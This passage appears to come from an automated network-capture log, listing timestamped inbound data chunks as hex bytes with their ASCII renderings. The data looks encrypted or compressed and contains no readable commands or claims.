2021-11-22 13:07:59 UTC	71	IN	Data Raw: f6 2a a4 9f 6b 11 26 b4 bd 02 c3 5e 07 b0 12 92 e9 b2 d8 0e 35 93 ca 81 24 ab b8 79 5a 81 a4 bc 04 a3 41 5b 2d 9a 87 41 af 5b b8 0f 94 72 f8 2c d1 5e a7 2f a2 97 90 fc 6a c0 11 3a fe 73 22 bc 71 47 d7 26 28 44 f0 13 17 83 bf 7d e4 b0 c9 c7 41 6b d1 2e 51 b4 67 79 2a 4a ab 59 c9 a8 da c0 68 0d 62 3a 2b 04 e6 a5 34 ae 02 98 27 88 86 df 77 b4 3f 05 eb f9 a8 98 ed d7 2a dc 03 26 9b c9 1f 67 3a 61 2f 1b ee 8e 18 a9 89 39 a4 e4 dd f2 4e 19 88 86 a5 98 68 db c4 04 3c 4a 4f 67 d1 6a 05 17 1f fa 0b 4a 0a 78 9d cc 27 1a 43 0a 9d f6 e8 87 3b 43 b9 e7 0c 73 d2 1a bf c6 ea 2b 5f d0 ce 22 63 bf e7 13 f0 c1 0a fb f7 6d 6d 32 80 c1 f6 78 d1 31 a0 4e 18 a4 09 f4 dc f2 30 2d 69 a0 30 49 35 66 e5 58 58 61 0c 60 90 f1 45 04 f3 95 fb 3a bd 49 5e 4d 55 9a 53 67 09 f6 fb 48 ae Data Ascii: k&^5$yZA[-A[r,^/j:s"qG&(D}Ak.QgyJYhb:+4'w?*&g:a/9Nh<JOgjJx'C;Cs+_"cmm2x1N0-i0I5fXXa`E:I^MUSgH
2021-11-22 13:07:59 UTC	72	IN	Data Raw: 79 62 72 37 fc 4d 31 b2 67 21 c3 f6 dc 4c eb 2e 24 72 be 57 63 5b 26 2f 1a 7a 0c dc 10 9a 2e 5d aa 0a 29 a9 d1 cb a7 fb 02 fa 98 93 fa eb e8 f5 de 59 d1 4c 4a bf 4f 87 41 76 46 ae c0 aa 54 04 3a d2 93 cc 0c 5a 01 1f de 7a 8a a9 8a 8f 2b 23 b2 3d 23 19 92 6d 0a 9d e2 6e 70 b9 b6 fb 22 6e e6 31 34 76 a9 34 6e bf 90 99 3b 17 0f 11 37 ea b9 bc 78 2d 56 18 fb 07 18 7e 63 24 3b 65 af a0 3e b5 4b c1 58 0b 0f 72 bd d7 e5 fd 61 ca 85 51 40 8e 51 c7 4c cd 59 fd b9 40 a7 df a4 42 50 4c db a2 7d d9 61 ce 3a c6 99 fa 6c 26 a1 e5 1a 36 ba 44 b3 b7 57 8a bb 10 c0 c8 0e 44 70 e8 d7 f8 36 de 2c c3 44 bc 22 ab 81 f8 ca 19 31 d0 df 28 bc 95 e7 f1 f7 f3 64 cd 32 c2 1c fd d6 ec 4c 3f b0 90 65 e7 17 3c b1 2c 67 97 aa 98 0f 30 1d 9e 82 ef 7a ea 4b 7e 1f 12 36 1e ab 70 31 ac 95 Data Ascii: ybr7M1g!L.$rWc[&/z.])YLJOAvFT:Zz+#=#mnp"n14v4n;7x-V~c$;e>KXraQ@QLY@BPL}a:l&6DWDp6,D"1(d2L?e<,g0zK~6p1
2021-11-22 13:07:59 UTC	74	IN	Data Raw: 7a 8c ce 70 34 31 53 68 f4 bd f5 79 c6 35 cb 0e c7 c1 79 04 78 22 6e 2f 37 ee 80 1f a5 94 26 8d 70 d1 02 50 23 a1 42 a2 82 77 64 49 14 30 55 6f 8d d9 75 16 75 0f d8 1e 21 2f a1 9d c6 2b 99 46 17 8a ef e6 eb b8 45 49 f9 3a 40 72 18 a9 c4 f8 8d 40 ca c3 52 2e 21 f6 17 c9 c2 32 3b ff 6d 7c a6 8e dd 17 64 e2 6c 2d 5b 1b a4 04 fc 48 e3 2f 3a 69 ab 9d d4 08 63 e0 50 27 c6 26 60 9a ef 43 19 ea 9b fc 12 3c b7 5f 61 c0 9a 5a 66 09 ee fb 43 b3 ad f6 7b 4d 5d 37 6d 98 09 77 43 c5 fc 81 4e 45 26 21 d6 bf 82 ed 93 b1 e3 88 f7 ec 67 ec 78 3a 16 cf f1 18 f7 21 84 b7 ad 54 e8 80 87 1f b9 6d a5 5a 8e 56 41 b3 e9 6b 95 f1 58 d2 7f 77 07 f4 80 5a 76 d2 02 93 b1 ac ed 0a cb e2 22 37 be 1c ed 93 47 61 11 59 12 fc b5 59 f5 b6 59 a2 1f 25 81 21 69 9e 2e d9 b8 29 98 f1 8b e1 44 Data Ascii: zp41Shy5yx"n/7&pP#BwdI0Uouu!/+FEI:@r@R.!2;m\|dl-[H/:icP'&`C<_aZfC{M]7mwCNE&!gx:!TmZVAkXwZv"7GaYYY%!i.)D
2021-11-22 13:07:59 UTC	75	IN	Data Raw: 8c 88 d5 92 91 be 31 5b 18 e3 15 f2 57 d7 24 2f 49 a2 20 39 bc 5d 3e 4d 33 19 4d 13 d7 ec eb 8b e3 73 50 6b 8a 6c c9 4c e7 59 fc b6 64 ba f7 f6 43 50 46 53 3e 7d c8 18 65 3e ee 9d f0 73 3c 9a 57 0b 3e a4 66 2d 9b f6 88 ad 9b ef 76 0e 45 6e 8f d5 d2 95 d4 21 c0 3f 83 fa a8 8b d3 d0 bc 94 d4 df 2f 80 99 f1 d9 5e f4 4e ce 32 fd 18 fd da 90 5e 2c b8 8e 5e 73 05 2f bc 02 76 91 aa 98 1f 28 18 81 30 5f 7e fb 45 05 2d c6 35 14 be 68 aa b8 98 e4 43 52 b6 52 0e 69 dd 4f 86 5d 7e 91 1a e5 1a f1 e0 9a f7 b9 00 ba 55 1f 9f 4d 84 3a 30 ac 3e 25 fa 97 27 9e ab 20 15 71 5e db f0 b3 5b 6c a1 40 57 a1 86 be 84 2c b6 37 87 f3 89 34 b4 ad d4 62 66 92 ad 8a 19 0f 47 69 d9 9b 9f 27 d7 5a c1 c2 44 50 e6 95 36 68 17 84 29 38 fd 69 3f bf 5b 70 41 71 31 1e 4f a3 c3 c7 42 6d 54 c5 Data Ascii: 1[W$/I 9]>M3MsPklLYdCPFS>}e>s<W>f-vEn!?/^N2^,^s/v(0_~E-5hCRRiO]~UM:0>%' q^[l@W,74bfGi'ZDP6h)8i?[pAq1OBmT
2021-11-22 13:07:59 UTC	76	IN	Data Raw: c4 f2 21 25 76 b4 ce 52 03 6d ff 55 37 4b 0c 7b aa ea 50 34 fb 95 ea 12 a4 b7 4e 49 cb 8b 54 7b 14 f5 71 7a 2f b4 e9 19 be 5a 38 74 b2 cd a9 4f ed 57 90 40 55 11 6e 4a ae 86 28 8c f4 55 99 f8 e0 78 a0 e4 2b 18 d2 fb 4a 6b 3c 90 a9 8d ac f6 82 af 9f aa 63 b0 79 bd 8f 42 b3 47 f5 84 ff e4 d8 60 68 8d e8 b6 e5 7f f2 80 93 b8 b3 7d e5 c4 d1 26 2f d2 1e ed 93 c4 7d 12 46 16 fc cb 3b e5 94 4e 94 88 6b 1d 30 78 97 2c f9 5a 34 66 f0 3b f7 72 5e 3a bb 12 fb 86 b7 4c 66 30 00 01 18 de d9 0d 1f 46 1b f7 04 36 c9 6f aa 0e 04 79 0a 97 b4 c5 1e 28 26 2d 99 b2 cf 2b 2d 8f 06 65 37 73 ef e9 a3 df 9d e8 a5 6e 85 7e fc 81 80 4a 0c 11 ed 8a 24 12 f2 3f c1 ee a1 57 3a ba 9d 70 bd 89 3c 70 3f 82 a9 1c 7e ec e4 11 7e 82 cb db 4e 86 b3 0c ad 85 b4 2e b1 39 60 88 36 71 43 38 81 Data Ascii: !%vRmU7K{P4NIT{qz/Z8tOW@UnJ(Ux+Jk<cyBG`h}&/}F;Nk0x,Z4f;r^:Lf0F6oy(&-+-e7sn~J$?W:p<p?~~N.9`6qC8
2021-11-22 13:07:59 UTC	77	IN	Data Raw: 1e fe a1 97 47 2e bc ae 4d 7f 13 2f 87 38 ea b8 aa 98 0e 22 09 8a bb 5a 71 c1 5a 6a 30 d3 cb 1f 81 64 a4 a0 95 db 26 ad b7 7e 1d 70 c7 42 1b 56 86 81 30 88 bd f2 cb 73 dd 66 6d ba 53 33 0b 6f 86 33 5e c0 2f 20 d6 8c 27 9e a1 0a 62 72 5e f3 83 64 5a 6a ab 53 41 a6 8a 81 b7 50 b3 20 7f e5 28 31 ac a6 d5 76 7f 7d a3 b0 0a 1d ee 78 d1 90 71 37 eb 4c fe d7 e2 9c e4 ee 5d 7b 06 91 12 0c e8 f6 53 c4 4c 58 e2 5b 31 14 69 a1 e2 d3 d2 69 4b d4 5b 66 7a 1b 20 74 a5 23 c9 54 11 b4 d2 cd 3b 4f 3f 03 1f 94 dc 7e 35 87 ba 6e 51 b4 a2 6a f9 a0 61 43 06 98 ad b1 9d 26 d3 20 96 76 d2 98 d3 5d cb 52 b1 9f ac c3 68 c0 11 29 df 79 3d 82 8f 46 fb 8e 20 4d f5 6a 18 aa a4 77 e9 b8 20 d5 65 69 d8 2d 4e a2 8f 86 07 6a b8 48 df 96 89 d9 96 0c 51 2a 13 0e cd 57 3e ca 67 66 26 a0 a6 Data Ascii: G.M/8"ZqZj0d&~pBV0sfmS3o3^/ 'br^dZjSAP (1v}xq7L]{SLX[1iiK[fz t#T;O?~5nQjaC& v]Rh)y=F Mjw ei-NjHQ*W>gf&
2021-11-22 13:07:59 UTC	79	IN	Data Raw: 73 18 ed ec 2e 17 40 61 97 93 db 74 35 46 1f f0 ee c6 e4 cb 46 ac 00 69 1d 30 67 83 09 ee 53 29 92 f2 3a fb 62 52 3d bb 14 96 ad b5 45 7b b4 03 5e 4b c7 d4 0b 79 1a 13 09 03 18 d3 97 b4 0b 04 7e 4d ab b6 c5 1e 28 00 2e 99 be c9 2b 71 8c 06 69 38 44 da e1 a3 d0 ed d4 59 6f a3 1f 7f 9b 80 4c 0c 56 bb 8b 24 1e fd 08 94 e6 a1 58 4a 89 61 71 9b ee 51 5b 3d 84 ab 6c 20 e0 e4 1e 62 bc 74 df 62 95 d8 0c 94 80 be 47 f0 10 4e 8e 1c 65 46 48 60 74 0c f8 5c 35 92 33 25 d2 e6 b8 e0 f1 2e 25 48 47 50 42 84 43 25 1a 7d 0c 33 15 d9 a4 4b a1 0c 39 6b 3c c5 98 fc 11 b4 b2 70 f8 81 97 e4 db 4b 94 e7 49 bc 34 ef 47 5e 05 85 c0 a0 45 13 1b d5 84 8b 85 5b 01 11 b1 e2 9b bf 8b b7 37 2b 9d 34 de 18 b8 7e 14 be c5 69 66 4d 9f f8 20 79 e7 08 cf 6e 57 35 53 ba 93 9c 10 f4 26 79 43 Data Ascii: s.@at5FFi0gS):bR=E{^Ky~M(.+qi8DYoLV$XJaqQ[=l btbGNeFH`t\53%.%HGPBC%}3K9k<pKI4G^E[7+4~ifM ynW5S&yC
2021-11-22 13:07:59 UTC	80	IN	Data Raw: 5e 4a 8e 90 26 e7 a8 d5 d5 c9 e3 e0 8a 26 64 61 09 3e 31 f8 d5 af ae 4c 58 7a 77 2e 07 70 2e d4 ce c6 61 ac d4 5b 60 e6 1d 2e 77 8e ba d2 54 16 3f 2a d3 01 52 34 94 19 8c dd a0 91 ab b8 79 c6 b2 ba 6a 27 11 4d 41 2d 06 80 4d 86 42 c1 bc 90 6d e2 9a 3f 5e b6 39 2d 99 b7 f2 77 8f 8d 3c f0 67 22 a5 13 40 e4 36 3f 0c 78 7a 0c 9f a0 62 72 a9 c1 cb 69 86 c0 26 4e 39 9f 67 26 59 c1 c3 d2 89 af de 7c 91 7b 37 1a 2c 6a b4 3c b1 97 60 39 87 ac 2b 70 a8 20 c1 71 f9 86 94 ae 4b 3d cb 38 c7 dc 79 13 69 1b 65 3d c9 74 8e 36 9a 40 39 b5 ec 5c 0a 50 1d a1 19 a2 82 77 64 5e 05 06 62 b1 76 d9 75 8a ef 01 fc 21 ef 0f 7a 9d 5a 2d 1a 7c 39 72 f6 f9 8f b8 52 58 ca 3f 47 48 1e b6 e9 7b e9 d2 d3 c7 63 79 21 e1 06 f9 fe 99 e8 ff 6d e0 3c 80 e3 17 30 61 30 ae 7b 03 27 1c f8 e6 d2 Data Ascii: ^J&&da>1LXzw.p.a[`.wT?*R4yj'MA-MBm?^9-w<g"@6?xzbri&N9g&Y\|{7,j<`9+p qK=8yie=t6@9\Pwd^bvu!zZ-\|9rRX?GH{cy!m<0a0{'
2021-11-22 13:07:59 UTC	81	IN	Data Raw: 23 b2 6a 6f 82 8a 04 4b 36 9d a6 fd 63 cd e8 11 70 93 5a c2 63 93 bd 3b 86 93 bf 28 b6 1a 51 99 c8 7a 79 75 73 7c 35 f2 62 89 64 cc da dc e2 a0 c0 ea 3f 29 45 47 50 42 8c 28 0c 18 7a 1c de 13 ee b5 57 aa 1d 35 6b 3c c5 98 f4 38 9e 0c 93 fa f0 e0 fd c8 44 be d4 40 a8 b7 95 6b 5d 19 bc cb a0 54 0b 34 db 7a a2 a9 44 10 1e b7 f3 82 33 a8 2a 28 2b 9c 0b 97 1d 94 7a 17 9d aa 6f 70 b5 f1 fc 20 6e ea 17 c5 65 a2 34 6e b3 ae 60 3a 3b 27 15 2c f0 b1 94 9f 32 44 e6 eb 23 0e 7d fe 18 1f 9d 46 d2 30 9f 4b c0 5f 2f 1e 5a 57 d7 e5 f7 de e2 5f 43 56 84 6c 7b 4b c5 41 02 ac 78 bc f5 79 e4 50 46 f7 28 55 4b 6a df 34 e5 8e f7 6c 28 a5 12 0a 12 ac 74 27 b3 5f 9a 53 9c eb ca 19 49 64 f4 da 2e 94 f2 2e e2 52 bf 35 80 16 fe dc 9e 31 ca d8 a7 1f 9b 29 b6 40 f2 64 cd 30 5e 1c fd Data Ascii: #joK6cpZc;(Qzyus\|5bd?)EGPB(zW5k<8D@k]T4zD3*(+zop ne4n`:;',2D#}F0K_/ZW_CVl{KAxyPF(UKj4l(t'_SId..R51)@d0^
2021-11-22 13:07:59 UTC	82	IN	Data Raw: 19 5c 7d e4 08 e5 47 b8 46 ac 61 49 e2 30 67 81 7e 98 5e 32 8b f5 17 e1 4e 7b c6 ba 3e e6 93 a4 41 71 df 05 3b e4 c7 f8 0e 01 4a 16 09 14 1e cb 41 f7 22 06 53 20 a8 3f cc 3e 47 20 1f 9a b8 20 46 33 8d a9 6f 3b 7d e7 9a 30 d6 82 f6 4d 47 87 70 2c 90 96 64 2e 3a 87 19 24 18 f4 36 fc cd a1 5e 2f b7 50 73 ba 8e 00 24 ae 82 a9 09 74 c9 ca 18 61 9e 23 e9 69 bb 99 26 96 86 be f5 08 13 4e 88 35 68 52 0b de 74 24 f2 57 24 9d 20 34 d5 e3 a3 da fb 41 eb 5f b9 5b 7d 94 70 30 0b 6b 0b dd 7b 14 a7 5c a0 1f 35 74 d0 cf 9c c8 38 b6 93 fc 36 fa ec ee ca 5f a9 13 58 af 58 84 56 4c 33 73 b3 1c 45 00 21 da 92 a4 ea 6c 03 19 bb f5 50 ba 93 8f 20 13 75 23 20 19 93 6d 00 da f1 6c 70 b9 b6 69 26 6e ea 1e e0 58 a9 34 75 ae 8b 95 32 3f 9a 06 3f fd de 49 94 2d 5c 1f fb 03 63 62 f9 Data Ascii: \}GFaI0g~^2N{>Aq;JA"S ?>G F3o;}0MGp,d.:$6^/Ps$ta#i&N5hRt$W$ 4A_[}p0k{\5t86_XXVL3sE!lP u# mlpi&nX4u2??I-\cb
2021-11-22 13:07:59 UTC	83	IN	Data Raw: 95 37 6a 10 98 00 53 ea f5 2e ae 45 43 18 70 1d 08 6b c9 14 d1 d2 45 4c 45 7b e0 7a 1b 31 3d 8e 88 d2 54 16 98 4f cc 17 4d 20 22 03 9e ca 89 23 55 b9 55 58 ac a8 72 0e bb b3 40 01 83 85 51 81 8b b4 2b bd 39 ff b8 aa 98 b6 39 b5 11 1f fe b2 f1 ae 2c c5 60 30 aa 86 5f 05 2a 0c 49 f2 56 09 8c bf 7e f6 51 df f8 44 68 c2 5d 88 a5 99 7c 88 f1 8b 95 cd 9b 8e c8 7e f3 7c 04 3a 1b eb b4 35 ad f5 67 0a a6 a7 cb 48 d6 df a2 88 e1 b5 5d ee d0 33 e5 ac db 84 33 3f 76 3d 7a 23 65 74 91 bc bb 81 39 06 ec c0 1d 59 26 88 af 7d 82 77 f8 58 0b 26 5e b1 77 f5 59 07 ed 08 5a 3e 39 0f 7b 8b ee 10 07 57 13 84 f2 e6 86 a8 6b 47 e6 21 76 fc 24 ab c4 6e b4 73 d7 d8 47 4d 08 e7 19 dc f2 44 f5 ec 64 7c 2b 96 ca f6 78 d1 3d af c7 3e bb 1a e6 c7 f7 3b 36 7f b4 df 41 01 93 ec 63 3d 4f Data Ascii: 7jS.ECpkELE{z1=TOM "#UUXr@Q+99,`0_*IV~QDh]\|~\|:5gH]33?v=z#et9Y&}wX&^wYZ>9{WkG!v$nsGMDd\|+x=>;6Ac=O
2021-11-22 13:07:59 UTC	84	IN	Data Raw: 64 92 da 1a 61 9e 4b e5 60 93 bd 0c d2 82 b4 22 a5 6a 89 88 36 7f 26 3e 60 74 2e d0 1b 37 9a 39 0d 8b f2 b3 c1 85 ab 23 5f bf 4e 24 95 54 2e 0b 75 05 de ea f4 8a 71 ac 80 78 73 c2 c5 a5 f8 3c 3a df 93 fa fb c4 4a db 4f b4 ed 78 be 49 9e 50 d2 3e af c0 a1 6d 33 2a d7 8e 8b cc 59 01 13 bb fd 9e ba 8f 9c 3d 24 85 1c de 18 b8 71 1d b1 d4 63 4e 8c 9a d4 22 71 ac 1b c7 76 b8 3b 60 a8 46 9f 17 02 26 04 bb ea b9 ad ce 2d 56 12 85 8d 0d 56 fd 33 3c 7c a8 3e 36 b5 5a cf 52 e1 1a 76 17 ef ee fe 75 e2 40 5b 53 87 47 5b 44 d1 a7 fd 81 58 b1 8c ce 42 50 42 7d 89 71 c4 78 d0 3e ff 98 e4 58 de b3 c0 5b 3c d5 a5 2b b3 53 84 bc 99 11 47 25 45 64 fe eb 9a 97 de 26 cb 2b 52 f8 a8 85 f8 af aa 34 d0 d5 38 ad f2 b2 db 54 f9 4c 85 18 5e 16 f4 ca 69 34 6f ba 84 47 57 51 3e b7 30 Data Ascii: daK`"j6&>`t.79#_N$T.uqxs<:JOxIP>m3*Y=$qcN"qv;`F&-VV3<\|>6ZRvu@[SG[DXBPB}qx>X[<+SG%Ed&+R48TL^i4oGWQ>0
2021-11-22 13:07:59 UTC	86	IN	Data Raw: ed f9 06 46 bb 5d af 5f 8e c1 6c 83 ca 2f ee 1b 30 39 17 b1 0b 64 0e ef 8e ce 7a dc 02 5d 77 fd df 42 e5 d7 3f ca 0e d7 9a f4 1a 69 23 84 31 79 53 98 00 b3 88 28 bc 7a df 01 25 ef ed b4 a2 82 77 f8 58 1a 2f 02 14 5e 48 75 16 e3 a7 49 1e 26 1c 75 9d d7 24 1a 6b e7 94 da d8 8d 5f 9c 47 e6 24 13 ea 1a a9 ce 7d f6 3d 94 da 4d 6f 95 a7 1b d6 d4 04 a8 f5 93 83 c5 80 ee 1b 76 fd 27 be 55 5f 45 1b cb de e3 2d 32 a0 a7 c2 57 52 7e e2 4f 26 44 12 76 64 ef 7c 02 f9 93 6e 23 ac 9f 05 61 5c 81 3b f3 17 e1 61 41 b8 aa fe 00 de 4c 28 7b a7 fa 89 42 e9 17 92 3b 96 39 56 4e a6 9d f2 5a 7d 54 99 f9 f2 50 ea e6 2b 12 d0 95 99 6b 30 8e af fe 93 ea 80 8d 92 ad 10 fb 51 ae b5 69 f1 eb f7 8e f6 51 4e 13 38 99 e5 84 6d 3f f0 80 99 b8 bb e7 68 84 ff 2e 1d 62 5e ef 93 d1 79 07 d0 Data Ascii: F]_l/09dz]wB?i#1yS(z%wX/^HuI&u$k_G$}=Mov'U_E-2WR~O&Dvd\|n#a\;aAL({B;9VNZ}TP+k0QiQN8m?h.b^y
2021-11-22 13:07:59 UTC	87	IN	Data Raw: 0c bf cc 76 e6 c0 df d6 22 64 c4 4a ca 76 a3 1c 3c ba b8 94 32 0e b2 b5 50 7f b0 85 92 a8 2b cd ea 0f 08 49 cd 33 34 63 a8 22 2f 4b 4a ec 4f 08 08 55 1e c6 ea e8 38 1c 5e 7e 42 a3 42 72 de 3e a6 03 87 4f 83 f0 07 33 57 46 f3 88 7d d9 7a dd 45 28 97 fb 68 23 36 7d 14 33 ee 28 2d b3 57 8e ae ee f9 ca 0e 4f 7d 96 b0 91 97 de 26 e1 12 96 f8 a2 a9 bd de 94 3c c8 b0 ad a9 81 f5 aa 6a f1 64 cd 64 61 1e fd d6 d7 03 2c b8 8e c1 9f 13 3c b6 36 fc 9d a8 e3 c5 24 09 8e 86 09 78 91 8a 6a 37 c0 bb a9 a0 64 be d0 5e dc 30 57 c2 d3 1f 67 cd 40 67 85 78 80 18 04 21 7c df 90 df 1c 0c 92 60 36 21 47 ac 6a 23 a9 25 37 04 2b 0d 9e a1 1b 7a 3b 5c db 89 10 79 6c ab 48 2d 7b 81 aa a8 7b a7 35 89 cc 5e 33 b4 a7 c2 a7 e4 a9 a2 9c 0a 77 2e 78 d6 8c 99 3e ef 14 d5 d5 c3 6c f7 86 31 Data Ascii: v"dJv<2P+I34c"/KJOU8^~BBr>O3WF}zE(h#6}3(-WO}&<jdda,<6$xj7d^0Wg@gx!\|`6!Gj#%7+z;\ylH-{{5^3w.x>l1
2021-11-22 13:07:59 UTC	88	IN	Data Raw: ce a1 1b d6 d4 3a aa fd 6d 76 12 dc d1 08 73 ec 33 a0 47 9a 92 1a e7 d6 89 ec 25 76 b0 79 27 0d 6c ed 45 95 73 27 61 9a ee 52 6c 33 95 ea 36 d7 89 5d 61 56 92 3e 02 57 e3 67 58 95 f5 eb 13 db 5a 79 79 b9 c7 77 41 be ab 90 40 5b 30 47 4c 78 03 dc 8c f2 7d e2 29 f0 78 a4 f5 26 30 98 ec 5f 61 32 f1 6f 8d ad ec 87 f4 bd aa 63 b0 42 a6 cc 00 b1 e9 fd ac bd 45 d8 6a 68 9f 96 c8 47 7d f8 a8 d1 b3 ac 7b 33 86 ff 2e 1d 5b 19 fc 9e 54 59 1f 46 1d 98 13 c5 e4 bc f1 c3 14 68 1d 3a c5 b9 8e f9 53 29 9a 8a dc f0 4a 68 31 aa 14 33 04 9d 45 71 cc 7a fd 1a c6 d0 1c 1b 71 55 08 05 10 d2 c4 30 0e 04 7c 25 f0 8a c7 14 4d 2a 27 ea f9 c9 44 39 a5 44 6d 3b 66 f4 e0 d0 90 80 fc 51 47 eb 72 2c 90 a8 09 0c 39 f3 9b 21 09 f3 af fd e3 a1 5c 5e 6c 63 71 95 36 6b 4e 3c 82 a3 a1 49 b5 Data Ascii: :mvs3G%vy'lEs'aRl36]aV>WgXZyywA@[0GLx})x&0_a2ocBEjhG}{3.[TYFh:S)Jh13EqzqU0\|%M*'D9Dm;fQGr,9!\^lcq6kN<I
2021-11-22 13:07:59 UTC	90	IN	Data Raw: c9 50 9e 5a b9 8b ed d5 85 3f c4 cb 31 25 ae f3 d9 55 e0 6f d6 11 48 0a 61 cd f4 50 39 24 95 46 57 b0 3c b7 30 fb 9b bd 08 22 2f 18 83 bd d6 52 fb 41 6a 3d d7 30 36 bc 66 bc a1 37 da 21 57 2c 46 37 aa c8 42 1a 59 f5 87 1c 8a 97 e3 ea 81 d5 0b 2c 74 57 37 27 ef 95 3a 37 bd 3b 08 71 a6 27 94 b7 95 6d 70 5e da 95 4c ab 6d ab 59 7c b2 aa ef ae 52 cf fb 81 e4 00 47 35 ad d5 70 78 87 b5 4a 85 1f e5 78 d7 a0 c4 34 c7 44 a1 f4 c9 7f fd e8 fb 7b 06 91 3a 55 26 f5 2e aa 5d 5c e0 60 35 8e 41 2e d2 d1 d8 e3 5a d0 4c b6 69 1f 20 66 bf 00 ec 19 e8 5c d3 ce 15 36 ee 08 1f 97 cd 0f 1f ab b8 7b 21 61 a5 72 03 b6 27 9b 2f e1 41 52 9f 59 d6 f8 2c 1d 7e bb d1 58 9c 39 a2 af aa e9 42 c0 11 3a e9 7b 3d bb 99 4d d0 30 20 4a f3 82 12 ad bd 6f e5 af d9 c2 b7 6a ec 24 59 ae 99 7f Data Ascii: PZ?1%UoHaP9$FW<0"/RAj=06f7!W,F7BY,tW7':7;q'mp^LmY\|RG5pxJx4D{:U&.]\`5A.ZLi f\6{!ar'/ARY,~X9B:{=M0 Joj$Y
2021-11-22 13:07:59 UTC	91	IN	Data Raw: 00 af bf 41 a2 fb e6 95 65 54 d4 71 7d 8a e9 e1 f5 7c f2 8a 80 bb b8 62 10 c2 f5 3f 1b 62 38 ed 93 d1 66 3f 5f 1f e1 de d7 ef 90 d2 ad 00 6f 0e 39 47 80 20 f9 53 a4 b3 f1 17 f1 59 61 18 ba 13 e5 8b 3a 6e 71 ce 00 3e 1d d7 df 25 a9 5b 12 0f 13 0c c3 ac e4 1d 15 75 02 83 b5 c5 14 54 2f 3d 8d 90 5d 45 33 8b 15 66 2a 67 cd 35 a7 d6 84 ea 4d 7c bd 62 38 8b 87 6a 0e 38 f9 8a 37 0b ec 33 fc 75 a0 5e 23 b2 6a 02 b3 83 04 5c 2e 8a b8 0b 73 ed 8b 30 63 94 33 cc 71 96 a1 35 9b 0e 03 3f 7d 02 5b 9b 38 50 41 69 6f 65 2a 69 4a 1b 88 22 20 d4 26 a0 ce fb 20 35 89 aa 5f 7f 88 4a 3b 2b 9c 0b c0 60 74 a6 5c ab 1d 3b 64 18 d3 62 73 11 b6 99 92 d2 b1 ee e4 d1 3b ac c5 4b a4 5a 99 56 56 29 e8 c1 a0 4f 11 26 b8 92 a2 85 51 6e 3d b3 e2 8c bf 93 99 38 38 9c 35 31 1e 1a cb 1b 6f Data Ascii: AeTq}\|b?b8f?_o9G SYa:nq>%[uT/=]E3fg5M\|b8j873u^#j\.s0c3q5?}[8PAioeiJ" & 5_J;+`t\;dbs;KZVV)O&Qn=8851o
2021-11-22 13:07:59 UTC	92	IN	Data Raw: 50 b0 90 bc a1 53 b0 23 97 f6 07 25 9c c4 d5 71 6f 90 a6 8d 0c 1c 1b 7b dc 8e a3 21 ef 9d d1 d5 cf 6e e2 19 4c 7b 06 94 10 35 eb f5 24 dd 1a 5a e6 7b 4b 1d 7e 68 c5 07 5f 6a 4b d4 5a 73 7f 18 35 73 ab 19 d7 da a1 b1 2f da 3f 24 27 08 19 80 ce 91 30 bd 46 7a 51 b3 89 65 2f 72 49 41 2b 8b 82 de e4 5d b8 21 be 69 f9 ba db 2d e0 3b b1 95 d2 f8 6d ea 11 3a ef 68 0d af 8f 87 fa 2b 20 8d e4 7c 02 97 ac 7d d6 1d df d4 49 6b d1 2c 51 aa 67 79 2a 41 ac 4c dc 89 9e d2 62 0d 6c 22 26 f2 e7 98 35 89 cc 66 26 a4 93 c7 63 a2 20 4c 7d f9 b3 75 e4 fb 30 c5 14 c9 92 7f 06 73 22 68 23 5f 72 80 1b a5 8f c7 b4 c0 c7 0f 5c 3c 9e 98 b1 88 77 e9 52 07 d1 43 63 7c c8 71 2c 95 1e d6 01 27 1c 70 9d d7 21 1a 41 e7 94 da f3 9e 2c 43 91 f5 28 7f c3 0b a3 c4 75 96 57 2b d9 61 63 be f4 Data Ascii: PS#%qo{!nL{5$Z{K~h_jKZs5s/?$'0FzQe/rIA+]!i-;m:h+ \|}Ik,Qgy*ALbl"&5f&c L}u0s"h#_r\<wRCc\|q,'p!A,C(uW+ac
2021-11-22 13:07:59 UTC	93	IN	Data Raw: d4 82 fc 9d 6f a9 61 38 89 86 5d 1d 3e ed 81 32 0b fa 34 d8 f5 ab 4a 36 a4 77 7c 92 93 05 48 39 90 ab 11 62 f3 e1 0a 62 bc 99 db 62 95 8e 23 94 80 b4 00 17 10 4e 8e 25 7d 44 7e 60 0f fd f8 5c 31 98 48 f9 c3 f0 b7 dd 70 55 fd 5f b9 55 01 18 5a 2e 1c 78 61 11 14 f5 a2 4a 30 77 de 73 c2 c0 db 96 38 b6 93 4d b2 df c4 d3 db 4f b4 d6 43 bc 58 9c 6f 31 01 af c6 88 90 04 2b d1 ac 0c 84 5b 07 3f a7 f1 8d 81 b8 9c 2c 21 44 00 05 31 a3 7c 0c bf d6 67 73 93 9f d4 22 ee c4 dd cc 76 af 1c d0 b9 b8 98 1d 01 37 05 17 c3 b1 85 9e f3 56 09 ed 36 8a 57 fb 20 2d 61 c2 f1 39 b5 4f 4e fb 08 c1 4d c4 c4 ea e4 7e da 90 52 40 88 45 31 97 cd 59 f8 bc 5f 29 e4 0a 40 2b 9a f3 3e 79 c8 60 c8 e8 74 84 f7 6e 5b 6f ec 0b 3a 82 22 3a b5 46 80 b9 b5 11 cc 0e 43 72 71 c4 d0 95 df 38 dd 44 Data Ascii: oa8]>24J6w\|H9bbb#N%}D~`\1HpU_UZ.xaJ0ws8MOCXo1+[?,!D1\|gs"v7V6W -a9ONM~R@E1Y_)@+>y`tn[o:":FCrq8D
2021-11-22 13:07:59 UTC	95	IN	Data Raw: 28 ba 8e ac f1 f2 af 7d 38 ef 71 1b bd 89 29 cc 29 20 47 f3 a6 00 98 ac 79 d6 0e de d4 49 6d d1 28 21 91 9b 78 0c 59 80 30 3f 97 8e cb 7b 01 6c 24 2d 37 64 b4 3c b1 0d 77 28 cb b8 cc 70 a2 36 4c 7b 89 4d 8b e5 dd 54 be 1f d8 90 f6 18 67 30 52 8c 57 72 97 0a d5 ea 3b b5 e6 ec 3a 49 24 8f f8 96 80 77 f2 49 16 38 94 20 7e d8 75 1c 86 74 d4 01 33 03 6b 96 ee 05 06 57 1f fa 9a fb 8f 2e 72 56 ed 26 71 da 77 9d c6 64 96 21 b9 da 4d 6f 9b cc 3f c7 d3 3a 99 ff 6d 7a 17 82 c2 03 51 d3 35 b1 4c 7a d7 18 e7 de d4 30 2e 70 a5 c0 27 2d 6f ed 45 58 27 0f 60 90 c8 41 19 ec 43 f9 3c b5 b9 4e 78 62 dd ab 8e e9 e9 4a 62 ac be c1 c8 d5 4c 3f 1b d4 c5 77 49 e3 71 9b 51 55 2d 